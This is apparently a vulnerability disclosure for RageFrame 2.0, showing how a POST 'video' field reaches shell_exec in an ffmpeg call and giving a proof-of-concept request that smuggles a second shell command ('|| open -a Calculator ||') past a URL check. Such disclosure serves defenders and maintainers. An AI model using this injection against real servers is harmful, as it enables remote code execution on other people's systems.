TheCommit

RageFrame 2.0(commit e02ba318639bdb99492d15f26e5cc012f1ed5a24) has a Remote Code Execute Vulnerability

Overview of Vulnerabilities

addons\RfExample\merchant\controllers\VideoController.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
public function actionCutImage()
    {
        $model = new CutImageForm();
        if ($model->load(Yii::$app->request->post())) {
            $filePath = StringHelper::getLocalFilePath($model->video);
            $img = Yii::getAlias("@attachment/") . "test1.jpg";

            // ffmpeg获取视频帧 -i 后面是输出 -y 是质量 -f 是输出格式  -t 时间
            // shell_exec("ffmpeg -i {$filePath} -y -f image2 -t 0.05 -s 352*240 {$img}");

            shell_exec("ffmpeg -ss 00:00:01  -i {$filePath} -f mjpeg -r 1 -vframes 1 -an {$img}");
        }

        return $this->render($this->action->id, [
            'model' => $model,
        ]);
    }

CutImageForm is derived from Model, CutImageForm->load is equivalent to Model->load, $model->load(Yii::$app->request->post()) gets the post parameter, $model->video takes the video parameter of POST , pass in the following function

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
public static function getLocalFilePath($url, $type = 'images')
    {
        if (RegularHelper::verify('url', $url)) {
            if (!RegularHelper::verify('url', Yii::getAlias("@attachurl"))) {
                $hostInfo = Yii::$app->request->hostInfo . Yii::getAlias("@attachurl");
                $url = str_replace($hostInfo, '', $url);
            } else {
                $url = str_replace(Yii::getAlias("@attachurl"), '', $url);
            }
        } else {
            $url = str_replace(Yii::getAlias("@attachurl"), '', $url);
        }

        return Yii::getAlias("@attachment") . $url;
    }

RegularHelper::verify('url', $url)equalspreg_match('/(http:\/\/)|(https:\/\/)/i', $url)

video=http://aaa;cmd;can satisfyRegularHelper::verify('url', $url)

so we use $filePath='xxx'.http://aaa;cmd; or $filePath='xxx'.http://aaa || cmd ||to RCE

Construction of environment

follow the document to install

installation

Preparation

Install a addon

Then visit http://localhost/backend/rf-example/video/cut-image, try to upload a mp3 and save

Finally we can catch a package

Send the package to Repeater

RCE

change CutImageForm[video] like below

CutImageForm[video]=http%3A%2F%2Flocalhost%2Fattachment%2Fvideos%2F2023%2F02%2F09%2Fmeeting_04.mp4+||open+-a+Calculator+||

Calculator will be open